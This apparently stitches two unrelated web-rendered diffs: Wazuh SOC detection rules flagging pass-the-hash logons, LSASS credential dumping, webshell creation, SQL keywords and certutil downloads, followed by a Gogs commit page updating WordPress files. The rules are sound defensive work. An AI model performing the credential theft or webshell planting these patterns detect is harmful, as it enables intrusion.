+    <description>A4-06 [PROD] Windows: remote interactive auth success logon type 10 (4624)</description>
89 
+    <group>soc_prod,a4,auth_success,remote,</group>
90 
+    <mitre><id>T1021.001</id></mitre>
91 
+    <mitre><id>T1078</id></mitre>
92 
+  </rule>
93 
+
94 
+  <rule id="110348" level="12">
95 
+    <if_sid>60106</if_sid>
96 
+    <field name="win.eventdata.authenticationPackageName">NTLM</field>
97 
+    <field name="win.eventdata.logonType">^3$</field>
98 
+    <description>A4-08 [PROD] Windows: NTLM network logon type 3 — pass-the-hash indicator (4624)</description>
99 
+    <group>soc_prod,a4,pth,</group>
100 
+    <mitre><id>T1550.002</id></mitre>
101 
+  </rule>
102 
+
103 
+  <rule id="110349" level="12">
104 
+    <if_sid>60106</if_sid>
105 
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)^guest$</field>
106 
+    <description>A4-09 [PROD] Windows: guest account auth success (4624)</description>
107 
+    <group>soc_prod,a4,auth_success,guest,</group>
108 
+    <mitre><id>T1078.001</id></mitre>
109 
+  </rule>
110 
+
111 
+  <rule id="110350" level="12">
112 
+    <if_sid>60106</if_sid>
113 
+    <field name="win.eventdata.logonType">^2$</field>
114 
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)svc|service|\$$</field>
115 
+    <description>A4-10 [PROD] Windows: service account interactive logon type 2 (4624)</description>
116 
+    <group>soc_prod,a4,service_account,</group>
117 
+    <mitre><id>T1078.003</id></mitre>
118 
+  </rule>
119 
+
120 
+  <!-- A4-11/12: Group membership changes (events 4728/4732)
121 
+       Parent: 60113 (member added to security-enabled group) -->
122 
+  <rule id="110352" level="12">
123 
+    <if_sid>60113</if_sid>
124 
+    <field name="win.system.eventID">^4728$</field>
125 
+    <description>A4-12 [PROD] Windows: account added to privileged domain group (4728)</description>
126 
+    <group>soc_prod,a4,privilege_escalation,</group>
127 
+    <mitre><id>T1098.007</id></mitre>
128 
+  </rule>
129 
+
130 
+  <rule id="110353" level="12">
131 
+    <if_sid>60113</if_sid>
132 
+    <field name="win.system.eventID">^4732$</field>
133 
+    <description>A4-11 [PROD] Windows: account added to privileged local group (4732)</description>
134 
+    <group>soc_prod,a4,privilege_escalation,</group>
135 
+    <mitre><id>T1098.007</id></mitre>
136 
+  </rule>
137 
+
138 
+  <!-- A4-13: DSRM password set (event 4794)
139 
+       Parent: 60103 -->
140 
+  <rule id="110354" level="12">
141 
+    <if_sid>60103</if_sid>
142 
+    <description>A4-13 [PROD] Windows DC: DSRM account password set (4794)</description>
143 
+    <group>soc_prod,a4,persistence,</group>
144 
+    <mitre><id>T1098</id></mitre>
145 
+  </rule>
146 
+
147 
+  <!-- A4-21/22/23/24: Account lifecycle (events 4720/4722)
148 
+       Parent: 60109 (account created/enabled) -->
149 
+  <rule id="110361" level="5">
150 
+    <if_sid>60109</if_sid>
151 
+    <field name="win.system.eventID">^4720$</field>
152 
+    <description>A4-21/23 [PROD] Windows: new user account created (4720)</description>
153 
+    <group>soc_prod,a4,account_create,</group>
154 
+    <mitre><id>T1136</id></mitre>
155 
+  </rule>
156 
+
157 
+  <rule id="110362" level="5">
158 
+    <if_sid>60109</if_sid>
159 
+    <field name="win.system.eventID">^4722$</field>
160 
+    <description>A4-22/24 [PROD] Windows: user account re-enabled (4722)</description>
161 
+    <group>soc_prod,a4,account_lifecycle,</group>
162 
+    <mitre><id>T1078</id></mitre>
163 
+  </rule>
164 
+
165 
+  <!-- ── Production normalized key=value path (soc-mvp production profile) ── -->
166 
+
167 
+
168 
+</group>

+ 44 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b1-vmware-rules.xml
ファイルの表示 

@@ -0,0 +1,44 @@
1 
+<!--
2 
+  SOC Proposal Rules — Appendix B1: VMware vCenter / ESXi
3 
+  Simulation profile rule IDs : 100401-100403
4 
+  Production profile rule IDs : 110401-110403
5 
+-->
6 
+<group name="soc_mvp,appendix_b,b1,vmware,">
7 
+
8 
+  <!-- ── Simulation profile ── -->
9 
+
10 
+
11 
+
12 
+
13 
+  <!-- ── Production profile (if_group=vmware + real log patterns) ── -->
14 
+
15 
+  <rule id="110401" level="12">
16 
+    <if_group>vmware</if_group>
17 
+    <match>Login failure</match>
18 
+    <description>B1-01 [PROD] vCenter: login failure detected (brute-force indicator)</description>
19 
+    <group>soc_prod,b1,vcenter,auth,</group>
20 
+    <mitre><id>T1110</id></mitre>
21 
+  </rule>
22 
+
23 
+  <rule id="110402" level="8">
24 
+    <if_group>vmware</if_group>
25 
+    <match>SSH login is enabled</match>
26 
+    <description>B1-02 [PROD] ESXi: SSH service enabled on host</description>
27 
+    <group>soc_prod,b1,esxi,ssh,</group>
28 
+    <mitre><id>T1021.004</id></mitre>
29 
+  </rule>
30 
+
31 
+  <rule id="110403" level="12">
32 
+    <if_group>vmware</if_group>
33 
+    <match>sshd</match>
34 
+    <description>B1-03 [PROD] ESXi: SSH authentication event detected</description>
35 
+    <group>soc_prod,b1,esxi,ssh,</group>
36 
+    <mitre><id>T1021.004</id></mitre>
37 
+  </rule>
38 
+
39 
+  <!-- ── Production normalized key=value path (soc-mvp production profile) ── -->
40 
+
41 
+
42 
+
43 
+
44 
+</group>

+ 22 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b2-logmon-rules.xml
ファイルの表示 

@@ -0,0 +1,22 @@
1 
+<!--
2 
+  SOC Proposal Rules — Appendix B2: Log Monitoring
3 
+  Simulation profile rule IDs : 100411
4 
+  Production profile rule IDs : 110411
5 
+-->
6 
+<group name="soc_mvp,appendix_b,b2,logmonitor,">
7 
+
8 
+  <!-- ── Simulation profile ── -->
9 
+
10 
+
11 
+  <!-- ── Production profile (anchored to 100260 = soc-prod-integrator) ── -->
12 
+
13 
+  <rule id="110411" level="5">
14 
+    <if_sid>100260</if_sid>
15 
+    <match>event_type=log_loss_detection</match>
16 
+    <description>B2-01 [PROD] Log Monitor: log ingestion loss detected on monitored stream</description>
17 
+    <group>soc_prod,b2,log_loss,</group>
18 
+    <mitre><id>T1562.006</id></mitre>
19 
+  </rule>
20 
+
21 
+
22 
+</group>

+ 97 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b3-sysmon-rules.xml
ファイルの表示 

@@ -0,0 +1,97 @@
1 
+<!--
2 
+  SOC Proposal Rules — Appendix B3: Windows Sysmon
3 
+  Simulation profile rule IDs : 100421-100426
4 
+  Production profile rule IDs : 110421-110426
5 
+
6 
+  Production rules use specific built-in Wazuh Sysmon SIDs as parents
7 
+  to avoid the N×M rule-tree explosion from if_group=sysmon:
8 
+    61603 → Sysmon event 1  (process create)
9 
+    61612 → Sysmon event 10 (process access)
10 
+    61613 → Sysmon event 11 (file create)
11 
+-->
12 
+<group name="soc_mvp,appendix_b,b3,sysmon,">
13 
+
14 
+  <!-- ── Simulation profile ── -->
15 
+
16 
+
17 
+
18 
+
19 
+
20 
+
21 
+
22 
+  <!-- ── Production profile ──
23 
+       Parents are specific built-in Wazuh Sysmon SIDs (not if_group=sysmon)
24 
+       to avoid N×M rule-tree explosion.
25 
+  -->
26 
+
27 
+  <!-- B3-01: LSASS process access via procdump (Sysmon event 10)
28 
+       Parent: 61612 (Sysmon event 10 - process access) -->
29 
+  <rule id="110421" level="12">
30 
+    <if_sid>61612</if_sid>
31 
+    <field name="win.eventdata.targetImage" type="pcre2">(?i)lsass\.exe</field>
32 
+    <description>B3-01 [PROD] Sysmon: LSASS process access detected (event 10)</description>
33 
+    <group>soc_prod,b3,credential_access,lsass,</group>
34 
+    <mitre><id>T1003.001</id></mitre>
35 
+  </rule>
36 
+
37 
+  <!-- B3-02: SQL injection keywords in process command line (Sysmon event 1)
38 
+       Parent: 61603 (Sysmon event 1 - process create) -->
39 
+  <rule id="110422" level="12">
40 
+    <if_sid>61603</if_sid>
41 
+    <field name="win.eventdata.commandLine" type="pcre2">(?i)select|union|insert|drop|exec</field>
42 
+    <description>B3-02 [PROD] Sysmon: SQL keyword in process command line (event 1)</description>
43 
+    <group>soc_prod,b3,webapp,sqli,</group>
44 
+    <mitre><id>T1190</id></mitre>
45 
+  </rule>
46 
+
47 
+  <!-- B3-03: Web script file creation (Sysmon event 11)
48 
+       Parent: 61613 (Sysmon event 11 - file create) -->
49 
+  <rule id="110423" level="12">
50 
+    <if_sid>61613</if_sid>
51 
+    <field name="win.eventdata.targetFilename" type="pcre2">\.(?:php|aspx|asp|jsp)$</field>
52 
+    <description>B3-03 [PROD] Sysmon: web script file created (possible webshell, event 11)</description>
53 
+    <group>soc_prod,b3,webapp,webshell,</group>
54 
+    <mitre><id>T1505.003</id></mitre>
55 
+  </rule>
56 
+
57 
+  <!-- B3-04: msiexec uninstall (Sysmon event 1)
58 
+       Parent: 61603 (Sysmon event 1 - process create) -->
59 
+  <rule id="110424" level="12">
60 
+    <if_sid>61603</if_sid>
61 
+    <field name="win.eventdata.commandLine" type="pcre2">(?i)msiexec</field>
62 
+    <field name="win.eventdata.commandLine" type="pcre2">(?i)/x|/uninstall</field>
63 
+    <description>B3-04 [PROD] Sysmon: msiexec uninstall detected (event 1)</description>
64 
+    <group>soc_prod,b3,defense_evasion,</group>
65 
+    <mitre><id>T1562.001</id></mitre>
66 
+  </rule>
67 
+
68 
+  <!-- B3-05: LSASS dump via Task Manager (Sysmon event 10)
69 
+       Parent: 61612 (Sysmon event 10 - process access) -->
70 
+  <rule id="110425" level="12">
71 
+    <if_sid>61612</if_sid>
72 
+    <field name="win.eventdata.sourceImage" type="pcre2">(?i)Taskmgr\.exe</field>
73 
+    <field name="win.eventdata.targetImage" type="pcre2">(?i)lsass\.exe</field>
74 
+    <description>B3-05 [PROD] Sysmon: LSASS dump via Task Manager (event 10)</description>
75 
+    <group>soc_prod,b3,credential_access,lsass,</group>
76 
+    <mitre><id>T1003.001</id></mitre>
77 
+  </rule>
78 
+
79 
+  <!-- B3-06: certutil download (Sysmon event 1)
80 
+       Parent: 61603 (Sysmon event 1 - process create) -->
81 
+  <rule id="110426" level="8">
82 
+    <if_sid>61603</if_sid>
83 
+    <field name="win.eventdata.image" type="pcre2">(?i)certutil\.exe</field>
84 
+    <description>B3-06 [PROD] Sysmon: certutil.exe execution detected (event 1)</description>
85 
+    <group>soc_prod,b3,download,</group>
86 
+    <mitre><id>T1105</id></mitre>
87 
+  </rule>
88 
+
89 
+  <!-- ── Production normalized key=value path (soc-mvp production profile) ── -->
90 
+
91 
+
92 
+
93 
+
94 
+
95 
+
96 
+
97 
+</group>

+ 134 - 0
wazuh-docker/single-node/config/wazuh_cluster/rules/soc-c1-c3-rules.xml
ファイルの表示 

@@ -0,0 +1,134 @@
1 
+<!--
2 
+  SOC Proposal Rules — Appendix C1-C3
3 
+  C1: Impossible Travel
4 
+  C2: Advanced Credential Abuse & Privilege Misuse
5 
+  C3: Lateral Movement & Internal Reconnaissance
6 
+
7 
+  Simulation profile rule IDs : 100501, 100511-100514, 100521-100524
8 
+  Production profile rule IDs : 110501, 110502, 110511-110514, 110521-110524
9 
+
10 
+  C1 prod: if_group=fortigate (VPN) or if_sid=100260 (soc-integrator)
11 
+  C2/C3 prod: specific built-in Wazuh SIDs to avoid N×M explosion:
12 
+    60106 → event 4624 (auth success / logon)
13 
+    60113 → events 4728/4732 (group membership change)
14 
+-->
15 
+<group name="soc_mvp,appendix_c,">
16 
+
17 
+  <!-- ================================================================
18 
+       C1: Impossible Travel Detection
19 
+       ================================================================ -->
20 
+
21 
+
22 
+  <rule id="110501" level="12">
23 
+    <if_group>fortigate</if_group>
24 
+    <match>action="ssl-login-success"</match>
25 
+    <description>C1-01 [PROD] VPN login success with geo context — impossible travel candidate</description>
26 
+    <group>soc_prod,c1,impossible_travel,identity,</group>
27 
+    <mitre><id>T1078</id></mitre>
28 
+  </rule>
29 
+
30 
+  <rule id="110502" level="15">
31 
+    <if_sid>100260</if_sid>
32 
+    <match>event_type=c1_impossible_travel</match>
33 
+    <description>C1-01 [PROD] Impossible travel confirmed by soc-integrator correlation</description>
34 
+    <group>soc_prod,c1,impossible_travel,identity,</group>
35 
+    <mitre><id>T1078</id></mitre>
36 
+  </rule>
37 
+
38 
+
39 
+
40 
+  <!-- ================================================================
41 
+       C2: Advanced Credential Abuse & Privilege Misuse
42 
+       ================================================================ -->
43 
+
44 
+
45 
+
46 
+
47 
+
48 
+  <!-- C2 production rules
49 
+       Parent: 60106 (event 4624 - logon success) for auth rules
50 
+               60113 (events 4728/4732 - group membership) for privilege rules -->
51 
+
52 
+  <rule id="110511" level="12">
53 
+    <if_sid>60106</if_sid>
54 
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)admin</field>
55 
+    <description>C2-01 [PROD] Privileged account auth success (4624)</description>
56 
+    <group>soc_prod,c2,credential_abuse,identity,</group>
57 
+    <mitre><id>T1078.002</id></mitre>
58 
+  </rule>
59 
+
60 
+  <rule id="110512" level="8">
61 
+    <if_sid>60106</if_sid>
62 
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)legacy</field>
63 
+    <description>C2-02 [PROD] Dormant/legacy account auth success (4624)</description>
64 
+    <group>soc_prod,c2,credential_abuse,identity,</group>
65 
+    <mitre><id>T1078</id></mitre>
66 
+  </rule>
67 
+
68 
+  <rule id="110513" level="12">
69 
+    <if_sid>60106</if_sid>
70 
+    <field name="win.eventdata.logonType">^10$</field>
71 
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)svc|service|\$$</field>
72 
+    <description>C2-03 [PROD] Service account remote interactive logon type 10 (4624)</description>
73 
+    <group>soc_prod,c2,service_account,identity,</group>
74 
+    <mitre><id>T1078.003</id></mitre>
75 
+  </rule>
76 
+
77 
+  <rule id="110514" level="12">
78 
+    <if_sid>60113</if_sid>
79 
+    <field name="win.system.eventID">^4732$</field>
80 
+    <description>C2-04 [PROD] Privilege escalation: group membership change (4732)</description>
81 
+    <group>soc_prod,c2,privilege_escalation,identity,</group>
82 
+    <mitre><id>T1098.007</id></mitre>
83 
+  </rule>
84 
+
85 
+
86 
+
87 
+
88 
+
89 
+  <!-- ================================================================
90 
+       C3: Lateral Movement & Internal Reconnaissance
91 
+       ================================================================ -->
92 
+
93 
+
94 
+
95 
+
96 
+
97 
+  <!-- C3 production rules
98 
+       Parent: 60106 (event 4624 - logon success) -->
99 
+
100 
+  <rule id="110521" level="12">
101 
+    <if_sid>60106</if_sid>
102 
+    <field name="win.eventdata.logonType">^10$</field>
103 
+    <description>C3-01/02 [PROD] RDP auth success logon type 10 (lateral movement indicator)</description>
104 
+    <group>soc_prod,c3,lateral_movement,rdp,</group>
105 
+    <mitre><id>T1021.001</id></mitre>
106 
+    <mitre><id>T1078</id></mitre>
107 
+  </rule>
108 
+
109 
+  <rule id="110522" level="12">
110 
+    <if_sid>60106</if_sid>
111 
+    <field name="win.eventdata.logonType">^3$</field>
112 
+    <description>C3-02 [PROD] SMB network logon type 3 (lateral movement indicator)</description>
113 
+    <group>soc_prod,c3,lateral_movement,smb,</group>
114 
+    <mitre><id>T1021.002</id></mitre>
115 
+    <mitre><id>T1078</id></mitre>
116 
+  </rule>
117 
+
118 
+  <rule id="110523" level="15">
119 
+    <if_sid>60106</if_sid>
120 
+    <field name="win.eventdata.targetUserName" type="pcre2">(?i)admin</field>
121 
+    <description>C3-03 [PROD] Admin account auth success — lateral movement candidate (4624)</description>
122 
+    <group>soc_prod,c3,lateral_movement,admin,</group>
123 
+    <mitre><id>T1021.001</id></mitre>
124 
+    <mitre><id>T1078.002</id></mitre>
125 
+  </rule>
126 
+
127 
+  <!-- C3-04 PROD: WFP event 5156 has no specific built-in Wazuh parent SID.
128 
+       Skip prod rule to avoid N×M explosion from using a generic windows parent. -->
129 
+
130 
+
131 
+
132 
+
133 
+
134 
+</group>

+ 8 - 0
wazuh-docker/single-node/docker-compose.yml
ファイルの表示 

@@ -44,6 +44,14 @@ services:
44 44 
       - ./config/wazuh_cluster/wazuh_manager.conf:/var/ossec/etc/ossec.conf
45 45 
       - ./config/wazuh_cluster/local_decoder.xml:/var/ossec/etc/decoders/local_decoder.xml
46 46 
       - ./config/wazuh_cluster/local_rules.xml:/var/ossec/etc/rules/local_rules.xml
47 
+      - ./config/wazuh_cluster/rules/soc-a1-ioc-rules.xml:/var/ossec/etc/rules/soc-a1-ioc-rules.xml
48 
+      - ./config/wazuh_cluster/rules/soc-a2-fortigate-fw-rules.xml:/var/ossec/etc/rules/soc-a2-fortigate-fw-rules.xml
49 
+      - ./config/wazuh_cluster/rules/soc-a3-fortigate-vpn-rules.xml:/var/ossec/etc/rules/soc-a3-fortigate-vpn-rules.xml
50 
+      - ./config/wazuh_cluster/rules/soc-a4-windows-ad-rules.xml:/var/ossec/etc/rules/soc-a4-windows-ad-rules.xml
51 
+      - ./config/wazuh_cluster/rules/soc-b1-vmware-rules.xml:/var/ossec/etc/rules/soc-b1-vmware-rules.xml
52 
+      - ./config/wazuh_cluster/rules/soc-b2-logmon-rules.xml:/var/ossec/etc/rules/soc-b2-logmon-rules.xml
53 
+      - ./config/wazuh_cluster/rules/soc-b3-sysmon-rules.xml:/var/ossec/etc/rules/soc-b3-sysmon-rules.xml
54 
+      - ./config/wazuh_cluster/rules/soc-c1-c3-rules.xml:/var/ossec/etc/rules/soc-c1-c3-rules.xml
47 55
48 56 
   wazuh.indexer:
49 57 
     image: wazuh/wazuh-indexer:4.14.3

config · 92ae4370cd - Gogs: Simplico Git Service
Página Inicial Explorar Ajuda
Entrar
tum
/
whitesports
Observar 1
Favorito 0
Fork 0
Código Problemas 0 Pull Requests 0 Commits 9 Versões 0 Wiki
Ver Código Fonte

config

Tum 3 anos atrás
pai
767b8f2b84
commit
92ae4370cd
100 arquivos alterados com 1724 adições e 773 exclusões
Visão dividida Mostrar estatísticas do Diff
  1. 1 1
      app/license.txt
  2. 8 8
      app/readme.html
  3. 177 156
      app/wp-admin/about.php
  4. 4 3
      app/wp-admin/admin-ajax.php
  5. 21 5
      app/wp-admin/admin-header.php
  6. 16 1
      app/wp-admin/admin-post.php
  7. 19 8
      app/wp-admin/admin.php
  8. 1 1
      app/wp-admin/async-upload.php
  9. 27 14
      app/wp-admin/authorize-application.php
  10. 3 1
      app/wp-admin/comment.php
  11. 8 1
      app/wp-admin/credits.php
  12. 152 91
      app/wp-admin/css/about-rtl.css
  13. 1 1
      app/wp-admin/css/about-rtl.min.css
  14. 152 91
      app/wp-admin/css/about.css
  15. 1 1
      app/wp-admin/css/about.min.css
  16. 5 6
      app/wp-admin/css/admin-menu-rtl.css
  17. 1 1
      app/wp-admin/css/admin-menu-rtl.min.css
  18. 5 6
      app/wp-admin/css/admin-menu.css
  19. 1 1
      app/wp-admin/css/admin-menu.min.css
  20. 1 1
      app/wp-admin/css/color-picker-rtl.css
  21. 1 1
      app/wp-admin/css/color-picker.css
  22. 17 0
      app/wp-admin/css/colors/_admin.scss
  23. 7 0
      app/wp-admin/css/colors/_variables.scss
  24. 17 0
      app/wp-admin/css/colors/blue/colors-rtl.css
  25. 1 1
      app/wp-admin/css/colors/blue/colors-rtl.min.css
  26. 17 0
      app/wp-admin/css/colors/blue/colors.css
  27. 1 1
      app/wp-admin/css/colors/blue/colors.min.css
  28. 3 0
      app/wp-admin/css/colors/blue/colors.scss
  29. 26 9
      app/wp-admin/css/colors/coffee/colors-rtl.css
  30. 1 1
      app/wp-admin/css/colors/coffee/colors-rtl.min.css
  31. 26 9
      app/wp-admin/css/colors/coffee/colors.css
  32. 1 1
      app/wp-admin/css/colors/coffee/colors.min.css
  33. 1 0
      app/wp-admin/css/colors/coffee/colors.scss
  34. 17 0
      app/wp-admin/css/colors/ectoplasm/colors-rtl.css
  35. 1 1
      app/wp-admin/css/colors/ectoplasm/colors-rtl.min.css
  36. 17 0
      app/wp-admin/css/colors/ectoplasm/colors.css
  37. 1 1
      app/wp-admin/css/colors/ectoplasm/colors.min.css
  38. 1 0
      app/wp-admin/css/colors/ectoplasm/colors.scss
  39. 17 0
      app/wp-admin/css/colors/light/colors-rtl.css
  40. 1 1
      app/wp-admin/css/colors/light/colors-rtl.min.css
  41. 17 0
      app/wp-admin/css/colors/light/colors.css
  42. 1 1
      app/wp-admin/css/colors/light/colors.min.css
  43. 4 0
      app/wp-admin/css/colors/light/colors.scss
  44. 26 9
      app/wp-admin/css/colors/midnight/colors-rtl.css
  45. 1 1
      app/wp-admin/css/colors/midnight/colors-rtl.min.css
  46. 26 9
      app/wp-admin/css/colors/midnight/colors.css
  47. 1 1
      app/wp-admin/css/colors/midnight/colors.min.css
  48. 3 0
      app/wp-admin/css/colors/midnight/colors.scss
  49. 26 9
      app/wp-admin/css/colors/modern/colors-rtl.css
  50. 1 1
      app/wp-admin/css/colors/modern/colors-rtl.min.css
  51. 26 9
      app/wp-admin/css/colors/modern/colors.css
  52. 1 1
      app/wp-admin/css/colors/modern/colors.min.css
  53. 5 0
      app/wp-admin/css/colors/modern/colors.scss
  54. 17 0
      app/wp-admin/css/colors/ocean/colors-rtl.css
  55. 1 1
      app/wp-admin/css/colors/ocean/colors-rtl.min.css
  56. 17 0
      app/wp-admin/css/colors/ocean/colors.css
  57. 1 1
      app/wp-admin/css/colors/ocean/colors.min.css
  58. 1 0
      app/wp-admin/css/colors/ocean/colors.scss
  59. 26 9
      app/wp-admin/css/colors/sunrise/colors-rtl.css
  60. 1 1
      app/wp-admin/css/colors/sunrise/colors-rtl.min.css
  61. 26 9
      app/wp-admin/css/colors/sunrise/colors.css
  62. 1 1
      app/wp-admin/css/colors/sunrise/colors.min.css
  63. 1 0
      app/wp-admin/css/colors/sunrise/colors.scss
  64. 22 25
      app/wp-admin/css/common-rtl.css
  65. 2 2
      app/wp-admin/css/common-rtl.min.css
  66. 22 25
      app/wp-admin/css/common.css
  67. 2 2
      app/wp-admin/css/common.min.css
  68. 54 15
      app/wp-admin/css/customize-controls-rtl.css
  69. 1 1
      app/wp-admin/css/customize-controls-rtl.min.css
  70. 54 15
      app/wp-admin/css/customize-controls.css
  71. 1 1
      app/wp-admin/css/customize-controls.min.css
  72. 10 10
      app/wp-admin/css/customize-nav-menus-rtl.css
  73. 1 1
      app/wp-admin/css/customize-nav-menus-rtl.min.css
  74. 10 10
      app/wp-admin/css/customize-nav-menus.css
  75. 1 1
      app/wp-admin/css/customize-nav-menus.min.css
  76. 1 1
      app/wp-admin/css/customize-widgets-rtl.css
  77. 1 1
      app/wp-admin/css/customize-widgets-rtl.min.css
  78. 1 1
      app/wp-admin/css/customize-widgets.css
  79. 1 1
      app/wp-admin/css/customize-widgets.min.css
  80. 225 59
      app/wp-admin/css/dashboard-rtl.css
  81. 1 1
      app/wp-admin/css/dashboard-rtl.min.css
  82. 225 59
      app/wp-admin/css/dashboard.css
  83. 1 1
      app/wp-admin/css/dashboard.min.css
  84. 1 1
      app/wp-admin/css/deprecated-media-rtl.css
  85. 1 1
      app/wp-admin/css/deprecated-media-rtl.min.css
  86. 1 1
      app/wp-admin/css/deprecated-media.css
  87. 1 1
      app/wp-admin/css/deprecated-media.min.css
  88. 17 11
      app/wp-admin/css/edit-rtl.css
  89. 1 1
      app/wp-admin/css/edit-rtl.min.css
  90. 17 11
      app/wp-admin/css/edit.css
  91. 1 1
      app/wp-admin/css/edit.min.css
  92. 15 8
      app/wp-admin/css/forms-rtl.css
  93. 1 1
      app/wp-admin/css/forms-rtl.min.css
  94. 15 8
      app/wp-admin/css/forms.css
  95. 1 1
      app/wp-admin/css/forms.min.css
  96. 3 3
      app/wp-admin/css/install-rtl.css
  97. 1 1
      app/wp-admin/css/install-rtl.min.css
  98. 3 3
      app/wp-admin/css/install.css
  99. 1 1
      app/wp-admin/css/install.min.css
  100. 0 0
      app/wp-admin/css/list-tables-rtl.css

+ 1 - 1
app/license.txt
Ver Arquivo 

@@ -1,6 +1,6 @@
1 1 
 WordPress - Web publishing software
2 2
3 
-Copyright 2011-2021 by the contributors
3 
+Copyright 2011-2022 by the contributors
4 4
5 5 
 This program is free software; you can redistribute it and/or modify
6 6 
 it under the terms of the GNU General Public License as published by

+ 8 - 8
app/readme.html
Ver Arquivo 

@@ -13,7 +13,7 @@
13 13 
 <p style="text-align: center">Semantic Personal Publishing Platform</p>
14 14
15 15 
 <h2>First Things First</h2>
16 
-<p>Welcome. WordPress is a very special project to me. Every developer and contributor adds something unique to the mix, and together we create something beautiful that I&#8217;m proud to be a part of. Thousands of hours have gone into WordPress, and we&#8217;re dedicated to making it better every day. Thank you for making it part of your world.</p>
16 
+<p>Welcome. WordPress is a very special project to me. Every developer and contributor adds something unique to the mix, and together we create something beautiful that I am proud to be a part of. Thousands of hours have gone into WordPress, and we are dedicated to making it better every day. Thank you for making it part of your world.</p>
17 17 
 <p style="text-align: right">&#8212; Matt Mullenweg</p>
18 18
19 19 
 <h2>Installation: Famous 5-minute install</h2>
 
@@ -21,7 +21,7 @@
21 21 
 	<li>Unzip the package in an empty directory and upload everything.</li>
22 22 
 	<li>Open <span class="file"><a href="wp-admin/install.php">wp-admin/install.php</a></span> in your browser. It will take you through the process to set up a <code>wp-config.php</code> file with your database connection details.
23 23 
 		<ol>
24 
-			<li>If for some reason this doesn&#8217;t work, don&#8217;t worry. It doesn&#8217;t work on all web hosts. Open up <code>wp-config-sample.php</code> with a text editor like WordPad or similar and fill in your database connection details.</li>
24 
+			<li>If for some reason this does not work, do not worry. It may not work on all web hosts. Open up <code>wp-config-sample.php</code> with a text editor like WordPad or similar and fill in your database connection details.</li>
25 25 
 			<li>Save the file as <code>wp-config.php</code> and upload it.</li>
26 26 
 			<li>Open <span class="file"><a href="wp-admin/install.php">wp-admin/install.php</a></span> in your browser.</li>
27 27 
 		</ol>
 
@@ -51,21 +51,21 @@
51 51
52 52 
 <h2>System Requirements</h2>
53 53 
 <ul>
54 
-	<li><a href="https://secure.php.net/">PHP</a> version <strong>5.6.20</strong> or higher.</li>
55 
-	<li><a href="https://www.mysql.com/">MySQL</a> version <strong>5.0</strong> or higher.</li>
54 
+	<li><a href="https://secure.php.net/">PHP</a> version <strong>5.6.20</strong> or greater.</li>
55 
+	<li><a href="https://www.mysql.com/">MySQL</a> version <strong>5.0</strong> or greater.</li>
56 56 
 </ul>
57 57
58 58 
 <h3>Recommendations</h3>
59 59 
 <ul>
60 
-	<li><a href="https://secure.php.net/">PHP</a> version <strong>7.4</strong> or higher.</li>
61 
-	<li><a href="https://www.mysql.com/">MySQL</a> version <strong>5.6</strong> or higher.</li>
60 
+	<li><a href="https://secure.php.net/">PHP</a> version <strong>7.4</strong> or greater.</li>
61 
+	<li><a href="https://www.mysql.com/">MySQL</a> version <strong>5.7</strong> or greater OR <a href="https://mariadb.org/">MariaDB</a> version <strong>10.2</strong> or greater.</li>
62 62 
 	<li>The <a href="https://httpd.apache.org/docs/2.2/mod/mod_rewrite.html">mod_rewrite</a> Apache module.</li>
63 63 
 	<li><a href="https://wordpress.org/news/2016/12/moving-toward-ssl/">HTTPS</a> support.</li>
64 64 
 	<li>A link to <a href="https://wordpress.org/">wordpress.org</a> on your site.</li>
65 65 
 </ul>
66 66
67 67 
 <h2>Online Resources</h2>
68 
-<p>If you have any questions that aren&#8217;t addressed in this document, please take advantage of WordPress&#8217; numerous online resources:</p>
68 
+<p>If you have any questions that are not addressed in this document, please take advantage of WordPress&#8217; numerous online resources:</p>
69 69 
 <dl>
70 70 
 	<dt><a href="https://codex.wordpress.org/">The WordPress Codex</a></dt>
71 71 
 		<dd>The Codex is the encyclopedia of all things WordPress. It is the most comprehensive source of information for WordPress available.</dd>
 
@@ -74,7 +74,7 @@
74 74 
 	<dt><a href="https://planet.wordpress.org/">WordPress Planet</a></dt>
75 75 
 		<dd>The WordPress Planet is a news aggregator that brings together posts from WordPress blogs around the web.</dd>
76 76 
 	<dt><a href="https://wordpress.org/support/forums/">WordPress Support Forums</a></dt>
77 
-		<dd>If you&#8217;ve looked everywhere and still can&#8217;t find an answer, the support forums are very active and have a large community ready to help. To help them help you be sure to use a descriptive thread title and describe your question in as much detail as possible.</dd>
77 
+		<dd>If you&#8217;ve looked everywhere and still cannot find an answer, the support forums are very active and have a large community ready to help. To help them help you be sure to use a descriptive thread title and describe your question in as much detail as possible.</dd>
78 78 
 	<dt><a href="https://make.wordpress.org/support/handbook/appendix/other-support-locations/introduction-to-irc/">WordPress <abbr>IRC</abbr> (Internet Relay Chat) Channel</a></dt>
79 79 
 		<dd>There is an online chat channel that is used for discussion among people who use WordPress and occasionally support topics. The above wiki page should point you in the right direction. (<a href="https://web.libera.chat/#wordpress">irc.libera.chat #wordpress</a>)</dd>
80 80 
 </dl>

Diferenças do arquivo suprimidas por serem muito extensas
+ 177 - 156
app/wp-admin/about.php


+ 4 - 3
app/wp-admin/admin-ajax.php
Ver Arquivo 

@@ -27,8 +27,8 @@ send_origin_headers();
27 27 
 header( 'Content-Type: text/html; charset=' . get_option( 'blog_charset' ) );
28 28 
 header( 'X-Robots-Tag: noindex' );
29 29
30 
-// Require an action parameter.
31 
-if ( empty( $_REQUEST['action'] ) ) {
30 
+// Require a valid action parameter.
31 
+if ( empty( $_REQUEST['action'] ) || ! is_scalar( $_REQUEST['action'] ) ) {
32 32 
 	wp_die( '0', 400 );
33 33 
 }
34 34 
 
@@ -168,7 +168,7 @@ add_action( 'wp_ajax_nopriv_generate-password', 'wp_ajax_nopriv_generate_passwor
168 168
169 169 
 add_action( 'wp_ajax_nopriv_heartbeat', 'wp_ajax_nopriv_heartbeat', 1 );
170 170
171 
-$action = ( isset( $_REQUEST['action'] ) ) ? $_REQUEST['action'] : '';
171 
+$action = $_REQUEST['action'];
172 172
173 173 
 if ( is_user_logged_in() ) {
174 174 
 	// If no action is registered, return a Bad Request response.
 
@@ -201,5 +201,6 @@ if ( is_user_logged_in() ) {
201 201 
 	 */
202 202 
